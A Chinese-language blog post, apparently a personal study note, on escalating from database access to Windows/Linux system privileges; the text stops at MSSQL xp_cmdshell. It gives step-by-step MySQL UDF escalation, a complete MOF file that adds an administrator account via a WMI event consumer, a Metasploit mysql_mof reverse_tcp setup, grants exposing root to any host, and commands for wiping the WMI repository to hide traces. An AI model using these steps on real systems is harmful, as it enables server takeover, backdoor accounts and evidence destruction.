

<!DOCTYPE html>
<html lang="en" color-mode=light>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>数据库提权 - Hexo</title>
  <meta name="apple-mobile-web-app-capable" content="yes" />
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="google" content="notranslate" />
  <meta name="keywords" content=", 内网学习, 权限提升">
  <meta name="description" content="数据库常见数据库端口号1234567891011121...">
  <meta name="author" content="John Doe">
  <link rel="icon" href="/images/icons/16x16.png" type="image/png" sizes="16x16">
  <link rel="icon" href="/images/icons/32x32.png" type="image/png" sizes="32x32">
  <link rel="apple-touch-icon" href="/images/icons/180x180.png" sizes="180x180">
  <meta rel="mask-icon" href="/images/icons/stun-logo.svg" color="#333333">
  
    <meta rel="msapplication-TileImage" content="/images/icons/144x144.png">
    <meta rel="msapplication-TileColor" content="#000000">
  

  
<link rel="stylesheet" href="/css/style.css">


  
    
<link rel="stylesheet" href="https://at.alicdn.com/t/font_1445822_p6ry5n7lrr.css">

  

  
    
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.css">

  

  
    
      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/xcode.min.css" name="highlight-style" mode="light">

      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/solarized-dark.min.css" name="highlight-style" mode="dark">

      
  

  <script>
    var CONFIG = window.CONFIG || {};
    var ZHAOO = window.ZHAOO || {};
    CONFIG = {
      isHome: false,
      fancybox: true,
      pjax: false,
      loading: {
        gif: '/images/theme/loading.gif',
        lottie: ''
      },
      lazyload: {
        enable: true,
        only_post: 'false',
        loading: {
          gif: '/images/theme/loading.gif',
          lottie: ''
        }
      },
      donate: {
        enable: false,
        alipay: 'https://pic.izhaoo.com/alipay.jpg',
        wechat: 'https://pic.izhaoo.com/wechat.jpg'
      },
      galleries: {
        enable: true
      },
      fab: {
        enable: true,
        always_show: false
      },
      carrier: {
        enable: false
      },
      daovoice: {
        enable: false
      },
      preview: {
        background: {
          default: '',
          api: ''
        },
        motto: {
          default: '埋下一个梦，待它破土而出。',
          typing: true,
          api: 'https://v2.jinrishici.com/one.json',
          data_contents: '["data","content"]'
        },
      },
      qrcode: {
        enable: false,
        type: 'url',
        image: 'https://pic.izhaoo.com/weapp-code.jpg',
      },
      toc: {
        enable: true
      },
      scrollbar: {
        type: 'default'
      },
      notification: {
        enable: false,
        delay: 4500,
        list: '',
        page_white_list: '',
        page_black_list: ''
      },
      search: {
        enable: true,
        path: 'myblog/node_modules/hexo-generator-searchdb/templates/search.xml'
      }
    }
  </script>

  

  

<meta name="generator" content="Hexo 5.4.2"></head>

<body class="lock-screen">
  <div class="loading" id="loading"></div>
  
    


  <nav class="navbar">
    <div class="left">
      
        <i class="iconfont iconhome j-navbar-back-home"></i>
      
      
      
        <i class="iconfont iconmoono" id="color-toggle" color-toggle="light"></i>
      
      
        <i class="iconfont iconsearch j-navbar-search"></i>
      
    </div>
    <div class="center">数据库提权</div>
    <div class="right">
      <i class="iconfont iconmenu j-navbar-menu"></i>
    </div>
    
  </nav>

  
  

<nav class="menu">
  <div class="menu-container">
    <div class="menu-close">
      <i class="iconfont iconbaseline-close-px"></i>
    </div>
    <ul class="menu-content"><li class="menu-item">
        <a href="/ " class="underline "> 首页</a>
      </li><li class="menu-item">
        <a href="/galleries/ " class="underline "> 随拍</a>
      </li><li class="menu-item">
        <a href="/archives/ " class="underline "> 归档</a>
      </li><li class="menu-item">
        <a href="/tags/ " class="underline "> 标签</a>
      </li><li class="menu-item">
        <a href="/categories/ " class="underline "> 分类</a>
      </li><li class="menu-item">
        <a href="/about/ " class="underline "> 关于</a>
      </li></ul>
    
      <div class="menu-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
    
  </div>
</nav>
  <main id="main">
  <div class="article-wrap">
    <div class="row container">
      <div class="col-xl-3"></div>
      <div class="col-xl-6"><article class="article">
  <div class="wrap">
    <section class="head">
  <img   class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/blog-pictures/03.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  draggable="false">
  <div class="head-mask">
    <h1 class="head-title">数据库提权</h1>
    <div class="head-info">
      <span class="post-info-item"><i class="iconfont iconcalendar"></i>March 02, 2023</span>
      
      <span class="post-info-item"><i class="iconfont iconfont-size"></i>15223</span>
    </div>
  </div>
</section>
    <section class="main">
      <section class="content">
        
        <h1 id="数据库"><a href="#数据库" class="headerlink" title="数据库"></a>数据库</h1><h2 id="常见数据库端口号"><a href="#常见数据库端口号" class="headerlink" title="常见数据库端口号"></a>常见数据库端口号</h2><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">MySQL</span>						        <span class="hljs-number">3306</span><br><br><span class="hljs-attribute">SQL</span> Server						<span class="hljs-number">1433</span><br><br><span class="hljs-attribute">Oracle</span>							     <span class="hljs-number">1521</span><br><br><span class="hljs-attribute">pointbase</span>						 <span class="hljs-number">9092</span><br><br><span class="hljs-attribute">DB2</span>									<span class="hljs-number">50000</span><br><br><span class="hljs-attribute">sybase</span>								<span class="hljs-number">5000</span><br><br><span class="hljs-attribute">postgreSQL</span>						<span class="hljs-number">5432</span><br><br><span class="hljs-attribute">mongoDB</span>							<span class="hljs-number">27017</span><br><br><span class="hljs-attribute">redis</span>									<span class="hljs-number">6379</span><br><br><span class="hljs-attribute">memcached</span>						<span class="hljs-number">11211</span><br></code></pre></td></tr></table></figure>



<h2 id="数据库提权的目的"><a href="#数据库提权的目的" class="headerlink" title="数据库提权的目的"></a>数据库提权的目的</h2><p>数据库提权，并不是拿到数据库的root权限，并不是提升数据库用户的权限</p>
<p>而是拿到系统的权限，即system权限</p>
<h2 id="拿到root权限方法"><a href="#拿到root权限方法" class="headerlink" title="拿到root权限方法"></a>拿到root权限方法</h2><h3 id="查看配置文件"><a href="#查看配置文件" class="headerlink" title="查看配置文件"></a>查看配置文件</h3><p>最主要的方法</p>
<p>通过查看数据库的配置文件，得到root账号的密码</p>
<p>一般配置文件所在文件夹</p>
<figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs armasm"><span class="hljs-symbol">sql</span> <span class="hljs-meta">data</span> inc config conn database <span class="hljs-meta">common</span> <span class="hljs-meta">include</span>等<br></code></pre></td></tr></table></figure>



<p>其次就是查看数据库的存储文件或备份文件</p>
<p>存储文件的后缀一般是    <font color='red'>myd</font></p>
<p>查询存储文件位置</p>
<figure class="highlight axapta"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs axapta"><span class="hljs-keyword">select</span>  @@basedir <span class="hljs-keyword">as</span> basePath <span class="hljs-keyword">from</span>  dual <br></code></pre></td></tr></table></figure>

<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230109155241975.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230109155241975</span></p>
<h3 id="本地脚本爆破"><a href="#本地脚本爆破" class="headerlink" title="本地脚本爆破"></a>本地脚本爆破</h3><p>本地爆破脚本网上比较多，一大堆，能不能破解就听天由命咯</p>
<h3 id="远程爆破"><a href="#远程爆破" class="headerlink" title="远程爆破"></a>远程爆破</h3><p>这个实现其实不太现实</p>
<p>它需要开放远程连接，但是敏感的root用户基本上是不会开放远程连接的，只能试试</p>
<h1 id="MYSQL提权"><a href="#MYSQL提权" class="headerlink" title="MYSQL提权"></a>MYSQL提权</h1><h2 id="UDF（user-defined-function）提权"><a href="#UDF（user-defined-function）提权" class="headerlink" title="UDF（user defined function）提权"></a>UDF（user defined function）提权</h2><h3 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h3><p>UDF是user defined function的简写，顾名思义是用    用户自定义函数进行提权</p>
<p>用户自定义函数是mysql数据库的一个拓展接口，它支持用户自定义函数的功能</p>
<p>但是自定义的函数，需要以    动态链接    的形式来写出mysql插件，来给mysql使用</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">linux的动态链接文件以<span class="hljs-string">.so</span>结尾<br>windows的动态文件以<span class="hljs-string">.dll</span>结尾<br></code></pre></td></tr></table></figure>



<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>原理主要是建立在MySQL的func上，官方的定义是：对认证的用户——只要拥有INSERT和DELETE这两个权限的用户，就可以在任意的数据库下面以MySQL创建一个函数，然后用这个函数去攻击数据库来达到我们的目的</p>
<p>mysql通常是使用管理员权限进行配置，我们通过mysql添加函数，执行的命令，自然是高权限</p>
<h3 id="使用条件"><a href="#使用条件" class="headerlink" title="使用条件"></a>使用条件</h3><ol>
<li><p><font color='orange'>拿到数据库的root权限，且mysql要有system权限</font></p>
</li>
<li><p><font color='orange'>知道数据库的账号密码</font></p>
</li>
</ol>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs">拿到webshell权限之后，读取网站数据库的<br>配置文件<br>存储文件<br>备份文件<br>来获取数据库用户的账号密码<br></code></pre></td></tr></table></figure>



<ol start="3">
<li><font color='orange'>可以远程登陆数据库</font></li>
</ol>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs">默认情况下，数据库是不允许远程登陆的，只允许本地登陆<br><br>这种情况，就只能通过拿到本机的高权限rdp远程登录桌面，才能连接<br></code></pre></td></tr></table></figure>



<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">mysql数据库的远程连接设置在	/etc/mysql/my.conf<br>对应设置为	bind-address = <span class="hljs-number">127.0</span><span class="hljs-number">.0</span><span class="hljs-number">.1</span><br>只需要把值改为	<span class="hljs-number">0.0</span><span class="hljs-number">.0</span><span class="hljs-number">.0</span><br><br>然后给远程登陆的用户赋予权限<br>新建一个用户<br>用	%	来允许任意ip登陆<br>操作如下<br><br>新建一个名为<span class="hljs-keyword">admin</span>的账户<br><span class="hljs-keyword">grant</span> <span class="hljs-keyword">all</span> <span class="hljs-keyword">on</span> *.* <span class="hljs-keyword">to</span> <span class="hljs-keyword">admin</span>@<span class="hljs-string">&#x27;%&#x27;</span> identified <span class="hljs-keyword">by</span> <span class="hljs-string">&#x27;123456&#x27;</span> <span class="hljs-keyword">with</span> <span class="hljs-keyword">grant</span> <span class="hljs-keyword">option</span>;<br>刷新配置<br>flush <span class="hljs-keyword">privileges</span>;<br><br>设置root账户可以外连<br><span class="hljs-keyword">grant</span> <span class="hljs-keyword">all</span> <span class="hljs-keyword">privileges</span> <span class="hljs-keyword">on</span> *.* <span class="hljs-keyword">to</span> <span class="hljs-string">&#x27;root&#x27;</span>@<span class="hljs-string">&#x27;%&#x27;</span> identified <span class="hljs-keyword">by</span> <span class="hljs-string">&#x27;123456&#x27;</span> <span class="hljs-keyword">with</span> <span class="hljs-keyword">grant</span> <span class="hljs-keyword">option</span>;<br>flush <span class="hljs-keyword">privileges</span>;<br></code></pre></td></tr></table></figure>



<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">还可以这样设置远程连接<br>首先登陆数据库<br><br>然后查看<span class="hljs-keyword">user</span>表中的记录<br><span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span>,host <span class="hljs-keyword">from</span> <span class="hljs-keyword">user</span><br><br>最后设置任意地址可以连接root<br><span class="hljs-keyword">update</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">set</span> host=<span class="hljs-string">&#x27;%&#x27;</span> <span class="hljs-keyword">where</span> <span class="hljs-keyword">user</span>=<span class="hljs-string">&#x27;root&#x27;</span>;<br>flush <span class="hljs-keyword">privileges</span>;<br></code></pre></td></tr></table></figure>



<ol start="4">
<li><font color='orange'>mysql有写入文件的权限</font></li>
</ol>
<p>通过查看<font color='red'><strong>secure_file_priv</strong></font>的值，来确定是否有写入权限</p>
<figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs autoit"><span class="hljs-keyword">select</span> @<span class="hljs-symbol">@secure_file_priv</span><br></code></pre></td></tr></table></figure>

<p>值为<font color='cornflowerblue'><strong>NULL</strong></font>，表示不允许导入导出，无法提权</p>
<p>值为<font color='cornflowerblue'><strong>/tmp/</strong></font>，表示只能在tmp目录下导入导出，无法提权</p>
<p>值为空，表示无限制，<font color='red'><strong>可以提权</strong></font></p>
<p>在**<font color='red'>my.ini</font><strong>文件里面修改，</strong><font color='red'>重启mysql数据库才能生效</font>**</p>
<p>在mysql5.5版本以前secure_file_priv的值默认为空，5.5版本以后默认为NULL</p>
<h3 id="提权操作"><a href="#提权操作" class="headerlink" title="提权操作"></a>提权操作</h3><ol>
<li><font color='orange'>查看数据库版本</font></li>
</ol>
<p>Windows的UDF提权是需要分mysql数据库版本的</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs csharp"><span class="hljs-function"><span class="hljs-keyword">select</span> <span class="hljs-title">version</span>()</span>;           <span class="hljs-meta">#查看数据库版本</span><br></code></pre></td></tr></table></figure>



<ol start="2">
<li><font color='orange'>判断存放位置</font></li>
</ol>
<p>当版本小于5.1</p>
<p>需要把udf.dll放在    <font color='red'>C:\windows\system32</font></p>
<p>当版本大于5.1</p>
<p>需要把udf.dll放在    <font color='red'>mysql\lib\plugin</font>，如果没有这个文件夹，就自己创建一个</p>
<figure class="highlight axapta"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs axapta"><span class="hljs-keyword">select</span> @@basedir           <span class="hljs-meta">#查看mysql数据库安装位置</span><br><br>show variables <span class="hljs-keyword">like</span> <span class="hljs-string">&quot;%plugin%&quot;</span>                 <span class="hljs-meta">#查看plugin位置</span><br><br>show variables <span class="hljs-keyword">like</span> <span class="hljs-string">&quot;%compile%&quot;</span>             <span class="hljs-meta">#查看数据库是32位还是64位</span><br></code></pre></td></tr></table></figure>

<p>然后根据版本上传udf.dll文件</p>
<ol start="3">
<li><font color='orange'>查找dll文件</font></li>
</ol>
<p>udf.dll文件是现成有的</p>
<p>在sqlmap和msf里面都有，根据<font color='red'>数据库版本</font>使用对应的dll文件即可</p>
<figure class="highlight livescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs livescript">sqlmap<br><br>sqlmap<span class="hljs-string">\data\udf\mysql</span>              <span class="hljs-comment">#dll文件路径</span><br><br>sqlmap里面的dll文件，为了防止被误杀，编码过，需要解码<br>sqlmap自带了解码脚本，在sqlmap<span class="hljs-string">\extra\cloak</span><br>python3 cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll   <span class="hljs-comment">#解码</span><br></code></pre></td></tr></table></figure>



<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs awk">msf<br><br><span class="hljs-regexp">/usr/</span>share<span class="hljs-regexp">/metasploit-framework/</span>data<span class="hljs-regexp">/exploits/my</span>sql/      <span class="hljs-comment">#dll文件路径</span><br><br>无需解码，直接使用<br></code></pre></td></tr></table></figure>



<ol start="4">
<li><font color='orange'>创建自定义函数</font></li>
</ol>
<p>创建sys_eval函数</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs csharp">create function sys_eval returns <span class="hljs-built_in">string</span> soname <span class="hljs-string">&#x27;udf.dll文件名字&#x27;</span>;   <span class="hljs-meta">#创建函数</span><br><br><span class="hljs-keyword">select</span> * <span class="hljs-keyword">from</span> func;           <span class="hljs-meta">#查看函数是否创建成功</span><br></code></pre></td></tr></table></figure>



<p>利用sys_eval函数执行命令</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs csharp"><span class="hljs-function"><span class="hljs-keyword">select</span> <span class="hljs-title">sys_eval</span>(<span class="hljs-params"><span class="hljs-string">&#x27;whoami&#x27;</span></span>)</span>;<br></code></pre></td></tr></table></figure>





<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>总的来说，最终目的就是</p>
<p>利用udf.dll文件来创建自定义函数</p>
<p>前提是我们可以远程连接数据库，且有一定的权限</p>
<p>还需要注意的是，如果要删除udf文件，首先记得删除函数，再删除文件，不然后续创建可能会起冲突</p>
<h2 id="MOF提权"><a href="#MOF提权" class="headerlink" title="MOF提权"></a>MOF提权</h2><h3 id="手工提权"><a href="#手工提权" class="headerlink" title="手工提权"></a>手工提权</h3><h4 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h4><p>Windows的这个目录下的    nullevt.mof文件</p>
<p>该文件每隔一段时间就会去执行一次</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">c:<span class="hljs-regexp">/windows/</span>system32<span class="hljs-regexp">/wbem/m</span>of/<br></code></pre></td></tr></table></figure>



<h4 id="适用条件"><a href="#适用条件" class="headerlink" title="适用条件"></a>适用条件</h4><p>只适用于低版本的Windows</p>
<p><strong><font color='cornflowerblue'>xp和server2003</font></strong></p>
<p>对c:/windows/system32/wbem/mof/     <font color='red'><strong>有写权限</strong></font></p>
<h4 id="提权操作-1"><a href="#提权操作-1" class="headerlink" title="提权操作"></a>提权操作</h4><ol>
<li><font color='orange'>找到一个拥有可写权限的目录上传mof文件</font></li>
</ol>
<p>文件内容</p>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs smali"><span class="hljs-comment">#pragma namespace(&quot;\\\\.\\root\\subscription&quot;) </span><br><span class="hljs-built_in"></span><br><span class="hljs-built_in">instance </span>of __EventFilter as $EventFilter <br>&#123; <br>    EventNamespace = <span class="hljs-string">&quot;Root\\Cimv2&quot;</span>; <br>    Name  = <span class="hljs-string">&quot;filtP2&quot;</span>; <br>    Query = <span class="hljs-string">&quot;Select * From __InstanceModificationEvent &quot;</span> <br>            <span class="hljs-string">&quot;Where TargetInstance Isa \&quot;</span>Win32_LocalTime\<span class="hljs-string">&quot; &quot;</span> <br>            <span class="hljs-string">&quot;And TargetInstance.Second = 5&quot;</span>; <br>    Query<span class="hljs-class">Language = &quot;WQL&quot;;</span> <br>&#125;; <br><span class="hljs-built_in"></span><br><span class="hljs-built_in">instance </span>of ActiveScriptEventConsumer as $Consumer <br>&#123; <br>    Name = <span class="hljs-string">&quot;consPCSV2&quot;</span>; <br>    ScriptingEngine = <span class="hljs-string">&quot;JScript&quot;</span>; <br>    ScriptText = <br>    <span class="hljs-string">&quot;var WSH = new ActiveXObject(\&quot;</span>WScript.Shell\<span class="hljs-string">&quot;)\nWSH.run(\&quot;</span>net.exe user admin admin123!@<span class="hljs-comment"># /add\&quot;)&quot;; </span><br>&#125;; <br><span class="hljs-built_in"></span><br><span class="hljs-built_in">instance </span>of __FilterToConsumerBinding <br>&#123; <br>    Consumer   = $Consumer; <br>    Filter = $EventFilter; <br>&#125;;<br><br></code></pre></td></tr></table></figure>





<ol start="2">
<li><font color='orange'>将该mof文件复制到c:/windows/system32/wbem/mof/</font></li>
</ol>
<figure class="highlight lasso"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs lasso"><span class="hljs-keyword">select</span>  load_file(<span class="hljs-string">&quot;C:/phpstudy/WWW/add_admin.mof&quot;</span>)  <span class="hljs-keyword">into</span>  dumpfile  <span class="hljs-string">&quot;C:/WINDOWS/system32/wbem/mof/add_admin.mof&quot;</span><br></code></pre></td></tr></table></figure>

<p>然后就等待，过一会系统就会自己执行该文件</p>
<p>然后就添加了admin账户</p>
<p>net user查看，发现管理员组多了admin这个账户</p>
<h4 id="痕迹清理"><a href="#痕迹清理" class="headerlink" title="痕迹清理"></a>痕迹清理</h4><ol>
<li>关闭 winmgmt 服务</li>
<li>删除mof文件</li>
</ol>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-comment"># 停止 winmgmt 服务</span><br>net stop winmgmt<br><span class="hljs-comment"># 删除 Repository 文件夹</span><br>rmdir <span class="hljs-regexp">/s /</span>q C:\Windows\system32\wbem\Repository\<br><span class="hljs-comment"># 手动删除 mof 文件</span><br>del C:\Windows\system32\wbem\mof\good\test.mof <span class="hljs-regexp">/F /</span>S<br><span class="hljs-comment"># 删除创建的用户</span><br>net user hacker /<span class="hljs-keyword">delete</span><br><span class="hljs-comment"># 重新启动服务</span><br>net start winmgmt<br></code></pre></td></tr></table></figure>





<h4 id="总结-1"><a href="#总结-1" class="headerlink" title="总结"></a>总结</h4><p><strong><font color='red'>在低版本的Windows 2003中，向mof文件夹里面写入特殊的mof文件，即可提权</font></strong></p>
<p>手动MOF提权的缺点是痕迹清理比较麻烦</p>
<h3 id="利用MSF进行MOF提权"><a href="#利用MSF进行MOF提权" class="headerlink" title="利用MSF进行MOF提权"></a>利用MSF进行MOF提权</h3><h4 id="提权操作-2"><a href="#提权操作-2" class="headerlink" title="提权操作"></a>提权操作</h4><p>这个就更简单了，直接利用msf的模块</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs gams">use exploit/windows/mysql/mysql_mof<br><span class="hljs-keyword">set</span> payload <span class="hljs-comment">windows</span>/meterpreter/<span class="hljs-comment">reverse_tcp</span><br><span class="hljs-keyword">set</span> <span class="hljs-comment">rhosts 192.168.10.17</span><br><span class="hljs-keyword">set</span> <span class="hljs-comment">username root</span><br><span class="hljs-keyword">set</span> <span class="hljs-comment">password root</span><br>run<br></code></pre></td></tr></table></figure>

<p>也是需要知道数据库高权限用户的，用户名和密码</p>
<h4 id="总结-2"><a href="#总结-2" class="headerlink" title="总结"></a>总结</h4><p>msf的mysql提权，提权之后，msf会<font color='cornflowerblue'>自动进行痕迹清理</font></p>
<p>方便高效</p>
<h2 id="启动项提权"><a href="#启动项提权" class="headerlink" title="启动项提权"></a>启动项提权</h2><h3 id="原理-2"><a href="#原理-2" class="headerlink" title="原理"></a>原理</h3><p>windows系统开机时会自动启动一些程序</p>
<p>这些程序是system启动的，所以这些程序都是拥有system权限的</p>
<p>主要思路就是向启动项中写入脚本，bat或vbs都可</p>
<p>利用mysql数据库写入，只是其中一种方法</p>
<p>详细在启动项提权里面</p>
<h1 id="MSSQL提权"><a href="#MSSQL提权" class="headerlink" title="MSSQL提权"></a>MSSQL提权</h1><h2 id="MSSQL数据库安装"><a href="#MSSQL数据库安装" class="headerlink" title="MSSQL数据库安装"></a>MSSQL数据库安装</h2><p><strong><font color='red'>以2008r2数据库为例</font></strong></p>
<p>下载数据库文件，以<font color='red'>管理员身份</font>运行setup</p>
<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113121335871.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113121335871</span></p>
<p>选择安装</p>
<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113121519051.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113121519051</span></p>
<p>然后一直默认直到，功能全选，目录默认</p>
<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113122140067.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113122140067</span></p>
<p>直到，配置选择system权限</p>
<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113122419065.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113122419065</span></p>
<p>选择混合模式，添加密码，添加当前账户</p>
<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113122611060.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113122611060</span></p>
<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113122713250.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113122713250</span></p>
<p>然后一直默认下一步，就行，然后就安装完成</p>
<h2 id="MSSQL数据库使用"><a href="#MSSQL数据库使用" class="headerlink" title="MSSQL数据库使用"></a>MSSQL数据库使用</h2><p>找到    <font color='cornflowerblue'><strong>SQL Server Management Studio</strong></font></p>
<p><strong><font color='red'>MSSQL数据库的管理员默认为   sa</font></strong></p>
<p>密码即为我们刚才设置的</p>
<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113123745137.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113123745137</span></p>
<p>连接即可使用</p>
<h2 id="xp-cmdshell提权"><a href="#xp-cmdshell提权" class="headerlink" title="xp_cmdshell提权"></a>xp_cmdshell提权</h2><h3 id="原理-3"><a href="#原理-3" class="headerlink" title="原理"></a>原理</h3><p>xp_cmdshell是数据库中可以执行系统命令的组件，可以利用该组件运行系统命令</p>
<p>xp_cmdshell是数据库系统存储过程，高权限的存储过程可以遍历和执行命令，xp_cmdshell就是可以任意执行系统命令的存储过程</p>
